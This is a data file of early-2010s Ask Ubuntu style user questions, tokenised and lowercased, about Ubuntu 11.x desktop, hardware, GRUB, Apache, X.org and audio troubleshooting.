71768	touchscreen and additional external monitor	soon i 'll commence a phd study with a strong focus on modelling . i 'm lucky enough to have my supervisor offer me a laptop . since besides making and running models i 'll be making minutes of meetings and perhaps giving a lecture from time to time , we were thinking of a touchscreen notebook . due to contracts i 'll be stuck with hp or dell . a nice laptop we 've found can be seen at here . the most important aspect here is probably that the graphics chip is an intel hd graphics 3000 . ideally i 'd work with just the touchscreen during meetings and lectures , and would extend the laptop to an external monitor for modelling purposes . in the latter case i 'd still use my laptop screen to draw diagrams . there are two points i 'm worried about for now : will the laptop touchscreen work with ubuntu 11.10 ? although similar questions on askubuntu and googling suggest that it wo n't be a problem , i 'd like to know for sure before buying the laptop . would be a real waste if i need to switch back to windows just to use the touchscreen . and if the touchscreen works , will it still work when i connect an external monitor ? i found a similar question ( see how do i calibrate a touchscreen on a dual monitor system ? ) but unfortunately that one has never been answered . if you can tell me anything that might help ( different set-ups that worked or did n't work , etc . ) , please let me know .
71769	how to broadcast audio output to iphone ?	is it at all possible to broadcast the usual audio output to an iphone or similar device ? so sort of audio server ( desktop ) to client ( iphone ) . more details : ubuntu 10.04/11.04 or 11.10 , iphone 3s or 4 . it is my understanding that the sound system shipped in ubuntu can be used as a sound server . the idea would be for the sound system to stream to a remote audio client , for example sitting in a different computer or an iphone , that computer/iphone could be connected to a audio amplifier in a different location than the computer where sound/music is played from . the streaming is of course by means of a local ( wireless ) network . ( although via bluetooth can be a solution also )
71772	evolution calendar ( desktop integration ) ask for password	evolution calendar desktop integration on ubuntu 11.10 ask all the time for password ( google account - gmail ) . this killing me . any advices ? online accounts deleted from ubuntu 11.10 . still getting this trouble .
71773	how to recover from the dash home appearing behind other running programs ?	can someone tell me how to recover from the dash home screen appearing behind the running programs ? i almost always have more than 50 applications running . many times this includes more than 30 firefox pages . every once in a while the dash home screen will appear behind all the windows and the only way i can recover from this problem is to log out and log back in or restart the computer . this often takes me up to an hour to get back to where i was working with all the applications i 'm using back into place . is there a way to stop this from happening ? does this happen to other people ?
71775	start ubuntu unity with dash open	how do you start ubuntu unity 3d with the dash open ? this is so that i can get things done fast . i would like to log in to my desktop with a full-screen dash without having to click the ubuntu dash button .
71776	can not scroll using trackpad on sony vaio	since upgrading my vaio notebook to ubuntu 11.10 , i am unable to scroll using my trackpad . tried all means to no avail . please suggest a step by step process to solve the problem . this has almost left me regretting the upgrade . looking forward to replies
71780	how well does a samsung qx411 ( sandy bridge/optimus ? ) work with ubuntu ?	new to the site , and debating returning to ubuntu . my question is tho , how will ubuntu run on my laptop . it 's a samsung qx411 , specs are : processor : intel core i5-2410m processor cores : 2 processor speed : 2.3 ghz processor cache : 3 mb l3 storage & memory : hard drive capacity : 640 gb ram size : 4 gb ram type : ddr3 sdram graphics : nvidia optimus geforce gt525 video memory configuration : dedicated dedicated video memory size : 1 gb wireless display ( widi ) capable : yes i would use the laptop for taking notes in school , power points , facebook , and last but not least , im an avid fan of civ v. reading the forums , i figure you can get civ and steam to run through wine ok . however , i am really worried about sandy bridge and optimus support . has anyone with a laptop managed to get full sandy bridge support , and is there a way to get my nvidia graphics drivers working properly ( ie i can use both the integrated and dedicated as please ? )
71784	how do i get out of this mess caused by power failure while upgrading from 11.04 to 11.10 ?	when my battery died and i started it again , it showd me a scan disc check screen . after which , it returned the black screen of before . i pressed all the function keys one after the other then ran my hand all over the keyboard . i am not sure what particular key triggered a 'dos looking ' log in screen . i inputed my old username and password and it brought me to a 'terminal like ' interface . i did sudo apt-get upgrade and it returned dpkg was interrupted you must manually run 'dpkg -- configure - a' how to manually run 'dpkg -- configure -a ' ? ? ? plzzzzz help
71788	planning to purchase a new computer with ubuntu-supported hardwares	i 'm planning to purchase a new computer with the most-recent hardware and i just want to make sure that ubuntu and the linux kernel support the hardware to buy . one point is that i want to build my own computer , instead of buying some computer from big companies because i do n't want a windows copy : ) the central point is whether intel i7 2600 ( sandybridge ) is supported by the latest ubuntu and linux version . also , is there any motherboard that linux can not understand ? thanks
71790	after downgrading to ubuntu 11.04 , how to keep gnome 2.x ?	having tried unity , gnome 3 , gnome-shell , xfce , and openbox , i would finally like to get back to gnome 2.x not being a hardcore linux user , my best bet is to do a clean install of ubuntu 11.04 with gnome classic ( the real one ) which worked very well for me . now how would i prevent the update manager to alert me with gnome updates ? i do n't want to mistakenly reinstall gnome 3 on top of ubuntu 11.04 ... thank you very much
71795	no filter result in synaptic	i am using ubuntu 11.10 . and i always depend on synaptic to install new software because i ca n't remember most of the software packages ' names correctly . but today , my freshly installed synaptic in my freshly installed ubuntu 11.10 just do n't give any result of the filter . i can still use search box to find packages , but it not as convenient for sure . so , does anyone here knows a possible solution for that . thank you in advance .
71799	what is my crontab -e local file path ? i want to set it via bash script	in my ubuntu , my username is `` meuser '' . when i do crontab -e , i can setup my rules . but instead of doing it with crontab -e , how can i do it directly to a file ? which file i cant modify ?
71804	change icon size in gnome 3	how does one change the default icon size for toolbar icons and such ?
71805	is there a start menu with a search box similar to the one in windows 7 ?	at the moment even i 'm using natty version of ubuntu , my virtualbox machine auto change the ui of startmenu that i would find the searchbox any more . i 'm looking for way to search & execute applications quickly like i do in windows 7 - rather than looking for it by nake-eye with the classic menu please help if you know how . thank you .
71808	changes in compiz do n't affect unity	i 've just installed ubuntu 11.10 , and added compiz ( which was n't there by default ) . i 've noticed , that all changes i make in unity plugin ( launchpad behavior , icos size , transparency ) do n't affect unity at all - it is just as it was after being installed . the changes are stored ( when i open the settings again all my changes are set ) , they just do n't appear on the screen : ) is there a way to solve this problem ?
71809	how to configure logitech vx revolution 's extra buttons ( zoom slider , ect . ) ?	is there any way to make work my logitech vx revolution 's extra buttons under ubuntu 11.10 ? under ubuntu 9.10 i 've found a graphical interface program that was suitable to configure the extra buttons , but forgot the package name . i 'd like to use the zoom slider buttons for controlling system volume , the upper search button for mute . please inform me about how can i set these buttons for the required functions , or if there 's any graphical interface program to configure with , that information would be nice too . thanks for the answers in advance !
71811	is it safe to uninstall unity ?	i 'm running oneiric on a really old laptop . unity is very slow and sluggish , whilst gnome-shell works perfectly.. oh so perfectly . this laptop has a pretty small hdd and i need to keep as much space free as possible . i 've seen that it is possible to uninstall unity and keen gnome-shell , but how safe is this ? will ubuntu automatically stop downloading updates for unity ? will any other important packages be affected by the removal of unity ? which other packages will become redundant after removing unity ?
71813	can i hide the title bar of mplayer in gnome ?	i 'm on a 10.04 machine with mplayer , â version svn-r1.0~rc3+svn20090426-4.4.3 . when you invoke mplayer from the command line to show a file , it displays the file within a window . this bar has a title , `` mplayer '' . how can i disable this bar , entirely ? i do n't want to remove the title only , but the complete window bar . it 's probably not an mplayer option , but rather something with the window toolkit ?
71814	how to re-compile nm0.9 with enabled wimax ?	i found that the new ubuntu comes with the network manager 0.9 , but without the enabled wimax support . please , give some advices how to re-compile it with -- enable-wimax features . thank you .
71816	how to increase the idle time that causes auto-lock to log in screen ?	at the moment i got ubuntu on my virtualbox and it seems to auto-lock very quickly . everytime i switch to virtualbox to use it , i always have to enter password . how can i increase the auto-lock period , says to 8 hours : d ? edit in ocelot 11.10 just hit screen from dash box to see the screen-lock application . i do n't know how to do that in natty 11.04
71817	how to block websites temporarily ?	is there any way to temporarily block websites in ubuntu 11.10 ? for example let 's say ... facebook ( or any other website ) is just available from 8pm or just for five minutes within two hours or anything ? : d thank you !
71818	is there a way to get gnome 3 unity ( from 11.10 ) in 11.04 ?	i have gnome 3 installed in my 11.04 and i was wondering if i can get 11.10 's unity in it
71823	how to keep unity panel always on top ?	i am working on a script that will allow you to use a video as a wallpaper . this script uses xwinwrap and mplayer , when i have the script running the video is shown as a wallpaper and with windows/files open it all works . but when i close or minimize all windows/files my unity panel and top panel disappear and the video comes on top of the panels.. i can get them back when pressing super or alt+tab but i want them to stay on top of the video wallpaper . hoping you guys can help me out ... greetings from tinuz
71828	what arm single-board computers does are supported by ubuntu ?	recently , arm single-board systems like the beagleboard has been made available on the market . unlike phones or tablets , these systems can be run as regular pc . but with the varieties of arm processors around , it 's not clear which devices that can run ubuntu arm . please create one answer , per model and make of the device , supported by ubuntu arm . old q are the official arm images compatible with raspberry pi ? after scouring their website , i 've gathered that raspberry pi is based on broadcom bcm2835 soc and arm11 processor . does the official arm images , starting with oneiric , support those ?
71831	apache 403 forbidden error - ca n't access webserver	yesterday my apache server decided to do n't run anymore and i do n't now why . every virtual host displays an 403-error-message like the following i copied from the log file : [ error ] [ client 127.0.0.1 ] ( 13 ) permission denied : access to / denied i think rights are set correctly , i prooved with ls -al /home/ ... and actually i did n't changed anything in the configuration : < virtualhost *:80 > serveradmin webmaster @ localhost servername webprojekte documentroot /home/tarea/webprojekte/work < directory / > options followsymlinks allowoverride none < /directory > < directory /home/tarea/webprojekte/work/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > by the way phpmyadmin is still working correctly . thank you helping me !
71841	latex on ubuntu 11.10	just installed ubuntu 11.10 after decades with windows . i need to use latex . on windows i used to install miktex then installed texniccenter and it worked . how do i do it on linux . miktex is for windows only . is latex already integrated in ubuntu ? but what editor do you then recommend ? i installed kile but do n't get it to compile . any ideas ? thanks .
71844	ubuntu one hangs at the end of installation	i 've just upgrade to ubuntu 11.10 and pressed to install ubuntu one from settings . the procedure started but stopped at the very end and hangs . tried uninstalling and reinstalling but no change . please can you suggest a solution or is this a bug . i like to use my cloud as a backup .
71846	gnome-shell and extensions error	i install and enable some gnome-shell extensions . then i restart computer and gnome-shell does n't working . it display only desktop background . i wonder how to disable or delete this extensions in unity ?
71862	how to create installer for the apps or copy them ?	i 've installed a lot of apps by ubuntu software center ( usc ) . i want to copy my apps to another pc . my internet connection is slow so i cant dl them from usc again . is there any way to make an installer for them & install them on another ubuntu pc or to copy them to another pc ?
71863	how to change pulseaudio sink with `` pacmd set-default-sink '' during playback ?	i need to switch the pulseaudio server of a currently playing audio stream . pulseaudio server is set up with ip 192.168.1.105 $ > cat /etc/pulse/default.pa ... load-module module-esound-protocol-tcp auth-anonymous=1 load-module module-native-protocol-tcp auth-anonymous=1 load-module module-zeroconf-publish ... on the source side vlc media player is playing a song . i created a new tunnel sink with pulseaudio on source side . pacmd load-module module-tunnel-sink server=192.168.1.105 pacmd set-default-sink 1 but while playing audio the server could n't be changed immediately . only after stopping the player and replay , it 's ok. from `` gnome-volume-control '' or `` gnome-control-center sound '' switching of output devices is applied immediately . how can i apply switching the output sink immediately from command line during playback of a sound file ?
71867	grub menu does n't appear when pressing shift	i 'd like to access my grub menu at boot by pressing shift . after i press shift i see a message saying `` grub loading.. '' but then no menu appears and the computer keeps booting normally into my ubuntu installation . do you know how i can access the grub menu at boot ? thanks a lot for your help !
71869	adwaita dark theme title bar stays white	i tried variety of methods to install to install / set the default adwaita white theme to use the dark version . this works , the only problem is the title bar in my black version stays white unlike the dark color in the screen shots of the theme . this is very distracting as it contrasts to much with the rest of the theme and basically makes it unusable which is a pity as it is a very nice looking theme otherwise . any help / advice will be greatly appreciated .
71873	grub menu empty	when i access grub at boot i do n't see any entry listed . i can see i 'm in grub because some debian grub menu splashdown in the background is displayed . but no entry is listed and nothing happens if i press e. if i press enter i just boot normally into my ubuntu installation . how can i get grub to display the entries ? thanks a lot in advance .
71874	how to select and copy content from the terminal ( atl + ctrl + f1 )	when in the 'lower level terminal ' ( not sure how this is called ) , the one opened by pressing ctrl + alt + f1 , how can i copy the content of the command i used there , since there is no mouse and i can not move my cursor out for the command line ?
71886	linking problems after upgrade to 11.10	i have a problem here that i ca n't quite explain . the linker is complaining that a symbol from the oracle client libraries is undefined : $ gcc-4.6 -l/usr/local/oracle/product/11.2.0/dbhome_1/lib -lcurl -m64 -lpthread -lclntsh advarc.o wintbx.a winlib_o.a -o advarc advarc.o : in function `main ' : advarc.c : ( .text+0x1c68 ) : undefined reference to `sqlcxt' advarc.c : ( .text+0x1f19 ) : undefined reference to `sqlcxt' advarc.c : ( .text+0x1fb3 ) : undefined reference to `sqlcxt' advarc.c : ( .text+0x21cc ) : undefined reference to `sqlcxt' advarc.c : ( .text+0x25f9 ) : undefined reference to `sqlcxt' advarc.o : advarc.c : ( .text+0x2693 ) : more undefined references to `sqlcxt ' follow wintbx.a ( stlthread.o ) : in function `initialisethread ' : stlthread.c : ( .text+0x70 ) : undefined reference to `pthread_setconcurrency' stlthread.c : ( .text+0x8a ) : undefined reference to `pthread_create' winlib_o.a ( winlib_o.o ) : in function `dbconnect ' : winlib_o.c : ( .text+0x8f6 ) : undefined reference to `sqlcxt' winlib_o.c : ( .text+0xa39 ) : undefined reference to `sqlcxt' winlib_o.a ( winlib_o.o ) : in function `dbdisconnect ' : winlib_o.c : ( .text+0xb03 ) : undefined reference to `sqlcxt' winlib_o.a ( winlib_o.o ) : in function `dbdynamic ' : winlib_o.c : ( .text+0xd44 ) : undefined reference to `sqlcxt' winlib_o.c : ( .text+0xef3 ) : undefined reference to `sqlcxt' winlib_o.a ( winlib_o.o ) : winlib_o.c : ( .text+0xf89 ) : more undefined references to `sqlcxt ' follow collect2 : ld returned 1 exit status but according to nm , the symbol is defined : nm /usr/local/oracle/product/11.2.0/dbhome_1/lib/libclntsh.so | grep sqlcxt 0000000001d154f0 t sqlcxt i was able to build and run the same code up to ( and including ) ubuntu 11.04 . the libclntsh library has been re-linked against the new system libraries .
71890	can not generate xorg.conf file	on a fresh install when i run x -configure , i get this error : x.org x server 1.10.4 release date : 2011-08-19 x protocol version 11 , revision 0 build operating system : linux 2.6.24-27-server x86_64 ubuntu current operating system : linux ombre-vostro-3550 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:56:25 utc 2011 x86_64 kernel command line : boot_image=/boot/vmlinuz-3.0.0-12-generic root=/dev/sda3 ro quiet splash vt.handoff=7 build date : 13 october 2011 05:44:30pm xorg-server 2:1.10.4-1ubuntu4.1 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.22.2 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : tue oct 25 20:44:05 2011 list of video drivers : ati cirrus vmware intel mach64 mga neomagic nouveau openchrome qxl r128 radeon s3 savage siliconmotion sis sisusb tdfx trident vmwlegacy fbdev vesa ( ee ) failed to load module `` vmwgfx '' ( module does not exist , 0 ) ( ee ) vmware : please ignore the above warnings about not being able to to load module/driver vmwgfx ( ++ ) using config file : `` /home/ombre/xorg.conf.new '' ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' ( ii ) [ kms ] no dricreatepcibusid symbol , no kernel modesetting . number of created screens does not match number of detected devices . configuration failed . ddxsiggiveup : closing log i do get an xorg.conf file but it seems empty ( or defaulted ) see below . i have been fighting on this problem for days and i am really getting desperate , this is my first linux experience and even though i learned a lot trying to solve issues i really wish i would get that fixed so i can finally use my computer . thank you all for any input you might have . section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' screen 2 `` screen2 '' rightof `` screen1 '' screen 3 `` screen3 '' rightof `` screen2 '' screen 4 `` screen4 '' rightof `` screen3 '' screen 5 `` screen5 '' rightof `` screen4 '' inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` module '' load `` dbe '' load `` dri '' load `` dri2 '' load `` extmod '' load `` glx '' load `` record '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor2 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor3 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor4 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor5 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` dri '' # [ < bool > ] # option `` colorkey '' # < i > # option `` videokey '' # < i > # option `` fallbackdebug '' # [ < bool > ] # option `` tiling '' # [ < bool > ] # option `` linearframebuffer '' # [ < bool > ] # option `` shadow '' # [ < bool > ] # option `` swapbufferswait '' # [ < bool > ] # option `` triplebuffer '' # [ < bool > ] # option `` xvmc '' # [ < bool > ] # option `` xvpreferoverlay '' # [ < bool > ] # option `` debugflushbatches '' # [ < bool > ] # option `` debugflushcaches '' # [ < bool > ] # option `` debugwait '' # [ < bool > ] # option `` hotplug '' # [ < bool > ] # option `` relaxedfencing '' # [ < bool > ] identifier `` card0 '' driver `` intel '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` noaccel '' # [ < bool > ] # option `` swcursor '' # [ < bool > ] # option `` dac6bit '' # [ < bool > ] # option `` dac8bit '' # [ < bool > ] # option `` bustype '' # [ < str > ] # option `` cppiomode '' # [ < bool > ] # option `` cpusectimeout '' # < i > # option `` agpmode '' # < i > # option `` agpfastwrite '' # [ < bool > ] # option `` agpsize '' # < i > # option `` gartsize '' # < i > # option `` ringsize '' # < i > # option `` buffersize '' # < i > # option `` enabledepthmoves '' # [ < bool > ] # option `` enablepageflip '' # [ < bool > ] # option `` nobackbuffer '' # [ < bool > ] # option `` dmaforxv '' # [ < bool > ] # option `` fbtexpercent '' # < i > # option `` depthbits '' # < i > # option `` pciapersize '' # < i > # option `` acceldfs '' # [ < bool > ] # option `` ignoreedid '' # [ < bool > ] # option `` customedid '' # [ < str > ] # option `` displaypriority '' # [ < str > ] # option `` panelsize '' # [ < str > ] # option `` forcemindotclock '' # < freq > # option `` colortiling '' # [ < bool > ] # option `` videokey '' # < i > # option `` ragetheatrecrystal '' # < i > # option `` ragetheatretunerport '' # < i > # option `` ragetheatrecompositeport '' # < i > # option `` ragetheatresvideoport '' # < i > # option `` tunertype '' # < i > # option `` ragetheatremicrocpath '' # < str > # option `` ragetheatremicroctype '' # < str > # option `` scalerwidth '' # < i > # option `` renderaccel '' # [ < bool > ] # option `` subpixelorder '' # [ < str > ] # option `` clockgating '' # [ < bool > ] # option `` vgaaccess '' # [ < bool > ] # option `` reverseddc '' # [ < bool > ] # option `` lvdsprobepll '' # [ < bool > ] # option `` accelmethod '' # < str > # option `` dri '' # [ < bool > ] # option `` connectortable '' # < str > # option `` defaultconnectortable '' # [ < bool > ] # option `` defaulttmdspll '' # [ < bool > ] # option `` tvdacloaddetect '' # [ < bool > ] # option `` forcetvout '' # [ < bool > ] # option `` tvstandard '' # < str > # option `` ignorelidstatus '' # [ < bool > ] # option `` defaulttvdacadj '' # [ < bool > ] # option `` int10 '' # [ < bool > ] # option `` exavsync '' # [ < bool > ] # option `` atomtvout '' # [ < bool > ] # option `` r4xxatom '' # [ < bool > ] # option `` forcelowpowermode '' # [ < bool > ] # option `` dynamicpm '' # [ < bool > ] # option `` newpll '' # [ < bool > ] # option `` zaphodheads '' # < str > identifier `` card1 '' driver `` radeon '' busid `` pci:1:0:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` rotate '' # < str > # option `` fbdev '' # < str > # option `` debug '' # [ < bool > ] identifier `` card2 '' driver `` fbdev '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` rotate '' # < str > # option `` fbdev '' # < str > # option `` debug '' # [ < bool > ] identifier `` card3 '' driver `` fbdev '' busid `` pci:1:0:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` defaultrefresh '' # [ < bool > ] # option `` modesetclearscreen '' # [ < bool > ] identifier `` card4 '' driver `` vesa '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` defaultrefresh '' # [ < bool > ] # option `` modesetclearscreen '' # [ < bool > ] identifier `` card5 '' driver `` vesa '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` card1 '' monitor `` monitor1 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` card2 '' monitor `` monitor2 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen3 '' device `` card3 '' monitor `` monitor3 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen4 '' device `` card4 '' monitor `` monitor4 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen5 '' device `` card5 '' monitor `` monitor5 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection here is my hardware : 01:00.0 vga compatible controller : ati technologies inc ni whistler [ amd radeon hd 6600m series ] subsystem : dell device 04cd kernel driver in use : radeon kernel modules : radeon 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) subsystem : dell device 04cd kernel driver in use : i915 kernel modules : i915 and here is my the xrandr -q output : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1366x768 60.0*+ 40.0 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected ( normal left inverted right x axis y axis ) 1680x945 59.9 + 1600x900 60.0 1280x1024 75.0 1440x900 59.9 1024x768 75.1 72.0 70.1 60.0 800x600 72.2 75.0 70.0 60.3 640x480 72.8 75.0 70.0 60.0 720x400 70.1
71891	how to relocate a boot partition ?	i have ubuntu 10.10. it is installed in one partition and the boot partition is a separate one . can i relocate the boot partition into the ubuntu partition and if yes how ? ?
71894	why ca n't i update wine 1.3 in 11.10 ?	i have 11.10 32-bit on an asus a6v . i installed wine 1.3 from the software center 1 week ago . today i ran a system update and it appears that a package ( microsoft windows compatibility layer ( binary emulator and library ) ) requires the installation of another package from an uncertified source , causing the update to fail . what should i do ?
71895	how can i install ubuntu 11.04 after removing the existing linux mint 8 ?	i have both windows xp and linux mint 8 on my system . i want to install ubuntu 11.04 after removing linux mint . is it possible to retain windows & only remove mint ? can i just format the linux partition from the live cd and install ubuntu into that partition ? can i dual boot into either windows or ubuntu from a menu without any problem if i follow this procedure ? could there be any problem while dual booting ? please advice . thanks in advance .
71896	failed to generate sqlite database in gtkpod	i am able to connect my ipod nano 5th generation ( black color + video camera ) to gtkopd and transfer mp3 files to it . upon trying to save those files so that i can eject my ipod the error message 'failed to generate sqlite database ' usually pops up . it 's like gtkpod does n't support 5th generation nano ipod though . now , is there any way ( s ) to get these mp3 files save to my ipod in oneiric ocelot ? i was able to use the file manager to connect and transfer many of the songs to the ipod but , the mp3 files never played for some reasons unknown to me .
71904	is there an easy way to change filetype association ?	after the upgrade to 11.10 i 've had the problems that all music-files would open with banshee , which then crashed all folders would open with konsole the first problem i after installation of `` ubuntu tweak '' `` > admin > filetype associations '' .. changed back to totem . the second was somehow not accessible this way ( did not give any possibility to add commands ) . i 've changed the line `` inode/directory=nautilus-folder-hanlder.desktop '' to `` inode/directory=nautilus.desktop '' from `` /usr/share/applications/defaults.list '' and now everything works fine . question : more convenient ways to do that ?
71907	python specifics in relation to ubuntu	i was wondering what experiences you have and can share in regards to using python in an ubuntu environment ? i have worked with ubuntu a bit but is there anything special that can be done with python code or libraries that can be used that ca n't in windows ? i have posted parts of what i have learned and used over time from my python work in ubuntu but not sure if i need direction in the sense of best practices etc . if you could review and comment about how i am doing , suggestions for improvement , or experience you could share would be great ! my existing code blurbs are at http : //www.pythonsnippet.com/snippets thanks in advance !
71909	recover ubuntu os after windows update/upgrade ?	my system had win 7 home basic , after which i created separate partitions for a linux ubuntu installation . after doing this i had the option to choose between each os at startup due to the dual boot . recently i 've updated win 7 home basic to professional edition . i have changed only the primary windows partition and i have n't touched the ubuntu partitions at all . strangely , after doing the windows upgrade , i lost access to ubuntu . i am not prompted to login to ubuntu during startup - i am being directly logged into windows without being prompted . why is this so ? is there a way to recover the ubuntu startup without reinstalling ubuntu again ?
71912	unable to change the keyboard shorcuts	i have installed oneiric oncelot . i wanted to change some keyboard shortcuts . so opened system settings > keyboard > shortcuts . but i am unable to change any ketboard shortcuts . everything is disabled . even the add ( + ) and remove ( - ) options are disabled . am i missing something here . i have installed compiz-settings-manager .
71916	samsung n135 brightness wo n't stop cycling after 11.10 upgrade	i updated my netbook to 11.10 last night . this morning i find my screen will not stop cycling through the brightness setting . fn key does n't respond and it 's actually using up all of my system resources , so i 'm typing this from my phone ! any ideas ?
71922	dell laptop wo n't shutdown / restart by itself	i recently upgraded to ubuntu 11.10 64-bit on my dell studio 1569 . before this i ran ubuntu 11.04 64-bit . every time i shutdown , or restart it goes through the usual processes , and shows no error ( i watch the shutdown messages by pressing the page down key ) . when it gets to the point where it says `` will now halt , '' or `` will now restart '' it fails to do so . this is a bit annoying since at this point i have to manually cut the power by holding down the power button . i never had any issue like this in 11.04 . also , hibernation no longer works . it was extremely slow in 11.04 ( slower than a cold boot ) but it worked . now nothing works . please help !
